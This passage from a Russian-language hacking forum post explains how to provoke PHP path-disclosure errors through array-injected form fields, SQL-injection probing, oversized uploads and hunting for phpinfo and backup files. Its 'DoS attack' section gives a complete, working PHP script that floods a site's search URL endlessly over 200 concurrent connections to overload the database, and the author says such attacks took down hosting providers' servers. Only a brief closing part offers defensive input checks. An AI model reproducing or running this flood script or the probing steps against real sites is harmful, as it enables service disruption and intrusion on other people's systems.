хихикаем. Далеко не всегда выходит проделать такое в адресной строке. Но есть же ещё формочки и незабвенный, а также редко проверяемый метод &quot;POST&quot;. Достаточно сохранить страницу с формой для залогинивания, подправить немного код (например: &lt;input type=&quot;text&quot; name=&quot;login[shit]&quot;&gt;) и нажать на сабмит. Все эти вещи в большой степени касаются и cookies — чем сложнее снаружи подделать, тем<br />реже идут проверки. Хотя и проверки бывают очень кстати — если логин проверяется preg_match — то php выдаст ошибку применения массива в регулярном выражении и наш любимый &quot;path disclosure&quot;. Защита может служить для нападения.<br />Ещё один неплохой способ — sql injection. Передавайте кавычки в разные переменные — возможно, вы найдете там sql injection. Вполне вероятно, он будет очень плохонький и не даст вам ничего сделать с самой базой данных… Но вы наверняка увидите что-то на подобие такой ошибки:<br />Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /opt/www/data/dealers/howtofindus.html on line 34<br />Как видно из описания ошибки, она наступает, когда есть проблемы с ответом от сервера. Чтобы вызвать такую ошибку, можно попробовать передавать разные цифровые данные в переменные (например, отрицательные номера анкет, текст вместо цифр и т.п). Редкий, но интересный способ — это закачка на сервер — если вам разрешено закачивать файлы на сервер (ещё лучше — конкретно картинки), то можно попробовать закачать файл на 10-30 мегабайт — тут возможны несколько вариантов ошибок:<br />&#160; &#160; После закачки файл обрабатывается, и скрипту не хватает памяти, чтобы его загрузить (ошибка о нехватки памяти выведет путь).<br />&#160; &#160; Если файл — картинка, после закачки, например, уменьшается до каких-то размеров — то ошибка внутри файла может вызвать ошибку обработчика, с всё тем же &quot;path disclosure&quot;.<br />&#160; &#160; Обработка файла будет длиться долго и вызовет ошибку слишком долгого выполнения скрипта.<br />Да и вообще, если у вас вышло загрузить сервер работой, можно добиться третьей ошибки без особых проблем. Обычно на хостингах время выполнения скрипта ограничено 20-30 секундами.<br />Поиск наобум.<br />Если пришлось дойти до этого, значит дела совсем плохи. Отчаиваться не надо — это будем делать, когда пиво кончится.<br />&#160; &#160; Ищем скрипты. Сначала такие вещи, как &quot;phpinfo.php&quot;, &quot;info.php&quot;,&quot;test.php&quot; ,&quot;1.php&quot; и другие подобные названия, в которых может вызываться функция phpinfo(), которая расскажет нам даже больше, чем мы заслуживаем.<br />&#160; &#160; Смотрим, какие скрипты уже есть на сервере и ищем их бекапы: &quot;1index.php&quot;,&quot;index2.php&quot;,&quot;_index.php&quot;,&quot;index_old.php&quot;. бекапы часто бывают бажные и выдают массу ошибок. Кроме того, можно поискать разные папки — вдруг там глючные файлы?<br />&#160; &#160; Если на сайте есть гостевая книга (левый форум, голосование и т.п.), но информации про раскрытие пути в сети не нашлось, надо понять, что за скрипты и каких версий стоят, скачать их у производителя и посмотреть изнутри — все ли переменные адекватно фильтруются? 90% таких поисков оканчиваются успехом.<br />Немного про DOS атаку<br />Мы не нашли ничего. Нам не помог гугл и багтрек — и вообще, на сайте стоит только какая-то неуязвимая CMS. Как быть? Что делать? Атаковать! Я не зря писал про &quot;хорошие&quot; ошибки mysql. Too many connections — это наше всё. Но как вывести из строя сайт хотя бы на пару минут? Прямой дос-атакой на php скрипт.<br />Вот план нашей атаки:<br />&#160; &#160; Найти url на сайте, который создает максимальную нагрузку на сервер (точнее на базу данных), чаще всего это url поиска, или вывода пары сотен сообщений на экран.<br />&#160; &#160; Как угодно, но быстро и много раз попросить сервер выполнить этот скрипт.<br />&#160; &#160; Следить — не начнёт ли ресурс выдавать mysql ошибки (иногда бывают и ошибки времени исполнения, тоже хорошо).<br />Итак, предположим мы нашли урл, который грузится две секунды и выдают нам в браузер мегабайт чего-то там (я не имею в виду файл на мегабайт — это должна быть информация из базы данных!)<br /><a href="http://victim.ru/search.php?find=a" rel="nofollow" target="_blank">http://victim.ru/search.php?find=a</a> — пусть оно выводит все сообщения, в которых есть буква &quot;а&quot;<br />Нам абсолютно не хочется, чтобы сервер грузил нас метрами мусора — поэтому мы должны ограничиваться только запросами к серверу, не читая ответ. Это делается таким php-скриптом:</p><div class="quote-box spoiler-box"><div onclick="$(this).toggleClass('visible'); $(this).next().toggleClass('visible');">КОД</div><blockquote><p>&lt;?<br />$site='victim.ru/search.php?find=a'; # адрес сайта без http://<br />$addr=explode('/',$site,2); # делим адрес на адрес сервера и адрес скрипта<br />$ip=gethostbyname($addr[0]); # узнаём IP сервера<br /># Составляем запрос документа:<br />$request= 'GET /' . $addr[1]. ' HTTP/1.0' . &quot;\r\n&quot;;<br />$request .= &quot;Accept: */*\r\n&quot;;<br />$request .= &quot;Host: &quot; . $addr[0] . &quot;\r\n\r\n&quot;;<br />while(true) # пусть атакует вечно ;)<br />{<br />for($i=1;$i&lt;=200;$i++) # будем использовать 200 соединений с сервером одновременно! (можно менять, но больше - не всегда лучше)<br />{<br />$f[$i]=NULL; # сбрасываем дескриптор<br />while(!$f[$i]) # пока дескриптор пустой, будем слать запросы на сервер<br />{<br />$f[$i]=@fsockopen($ip, 80, $errno, $errstr, 5); # 5 - это таймаут, можно менять.<br />}<br />$r=@fwrite($f[$i],$request); # отправляем наш злобный запрос серверу<br />}<br /># закрываем все открытые дескрипторы<br />for($i=1;$i&lt;=200;$i++)@fclose($f[$i]);<br />}<br />?&gt;</p></blockquote></div><p>Скрипт будет атаковать сервер со скоростью открытия соединения, а не скачивания результата. На результат наш скрипт вообще плевал. Чтобы регулировать скорость работы, можно менять количество открываемых соединений (здесь = 200) и количество одновременно запущенных скриптов (скажу, что с adsl линии у меня падали сервера серьезных хостеров, не говоря о дешевом collocation’е). Так что не переусердствуйте — вам надо положить не сервер, а только напрячь базу данных.<br />Защищаем свои сайты<br />Как же защитить свой сайт от &quot;path disclosure&quot;? Тут могу дать несколько разных советов:<br />&#160; &#160; Не используйте софт сторонних фирм, пишите сами и сами проверяйте переменные.<br />&#160; &#160; Проверьте вышеприведенными методами свой сайт — всё ли в порядке?<br />&#160; &#160; Всегда можно отключить ошибки в скрипте, поставив в начало директиву error_reporting(0);<br />Примеры защиты переменных:<br />$index=(int)$_GET[‘index’]; — защищает переменную сразу и от кавычек с текстом, и от массивов.<br />if(is_array($_POST[‘login’]))die(‘гадский хакер!’); — прямая проверка на массив.<br />Помните, большинство функций в PHP неадекватно работает с целыми массивами — всегда проверяйте, что вы им скармливаете.</p> mybb@mybb.ru (FedorDobr) Fri, 10 Feb 2017 18:45:06 +0300 https://carton.forum.cool/viewtopic.php?pid=8#p8